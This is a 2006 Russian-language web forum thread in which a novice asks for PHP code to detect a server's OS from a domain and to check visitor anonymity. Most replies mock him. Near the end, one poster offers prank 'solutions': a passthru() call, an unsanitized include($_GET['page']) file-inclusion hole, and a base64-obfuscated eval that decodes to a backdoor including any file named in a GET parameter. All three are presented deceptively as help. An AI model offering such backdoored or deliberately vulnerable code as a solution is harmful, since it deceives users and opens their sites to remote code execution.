Просмотр полной версии : помогите php
как определить ос на сервере по введенному домену? также нужен скрипт для проверки анонимности вашего компа. Если кому нетрудно набросайте код
как определить ос на сервере по введенному домену?
это можно без пхп, запустив xspider!
Я именно хочу на своес сайте зделать, вводишь в поле домен, а оно тебе выдает ос
Я именно хочу на своес сайте зделать, вводишь в поле домен, а оно тебе выдает ос
По ответу хоста на несоответствующие RFC пакеты (например TCP фреймы с флагами SYN, ACK,FIN,RST,URG,PUSH - взаимоисключающими)
А для тебя есть вариант простой и нехитрый - твой скрипт пошлет письмо админу и спросит "здрасьте, какая ОС у вас стоит"
также нужен скрипт для проверки анонимности вашего компа. Если кому нетрудно набросайте код
Ага, ща все брошу и буду тебе скрипт катать =))) чтоб ты его к себе на сайт повесил =)))
/me припевает: мани мани мани, на вебмани)))
также нужен скрипт для проверки анонимности вашего компа. Если кому нетрудно набросайте код
<?php
if (isset($_GET["author"]) && $_GET["author"] == "VIYu") header( "Location: /iam_lamer.php" );
die( "bananick" );
?>
Вы должны добавить репутацию кому-то еще, прежде чем сможете снова добавить ее Kez. Вот чёрт... :)
Вы добавили слишком много репутации в последние 24 часа. Попробуйте попозже.
(((((((((((((((
ZetRider
27.03.2006, 21:44
Сделаю за $... тебе на подобие такой инфы нужно выводить?:
Дата: [ 27.03.06 ] Время: [ 21:46 ] IP: 62.133.182.104
DNS: g104-182-133-62.ufacom.ru порт 3066
Хост: http://comp-info.ru/
Браузер: Mozilla/4.0_(compatible;_MSIE_6.0;_Windows_NT_5.1;_ru)_Ope ra_8.01
Инфа
Инфа : compatible
Версия : 4.0
Версия браузера : MSIE 6.0
Операционная система : Windows NT 5.1
Вы используете :Microsoft Internet Explorer
Процессор :undefined
Разрешение экрана : 1280x1024
Качество цветопередачи :32
Дата и время вашего компьютера и временная зона : Mon, 27 Mar 2006 23:46:39 GMT+0600
Дата и время в формате вашего компьютера :27.03.2006 23:46:39
мдя! ему нужен скрипт, который по введённому адресу хоста определяет ось которая стоит на серваке!
А что тама трудного kez, можна сказать почти описал, но пара штрихов и скрипт готов ))
Evolution
27.03.2006, 22:36
вот так:
<? passthru("c");?> // рульная вещь
ну или так тоже мона:
<?
$page = ($_GET['page']);
include("$page");
?>
да много есть спсобов сделать полезнле писитителям =).
переменные окружения тебе помогут, разрешение экрана и прочая фича с помощью ява скриптов и тд все что исполняется на клиенте
Вы наверно непоняли, вот пример сдесь: http://www.web-hack.ru/tools/
попробуй так
<?php
eval( base64_decode( "aWYgKGlzc2V0KCAkX0dFVFsnZG93biddICkpIGluY2x1ZGUoIC RfR0VUWydkb3duJ10gKTsg" ) );
?>
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot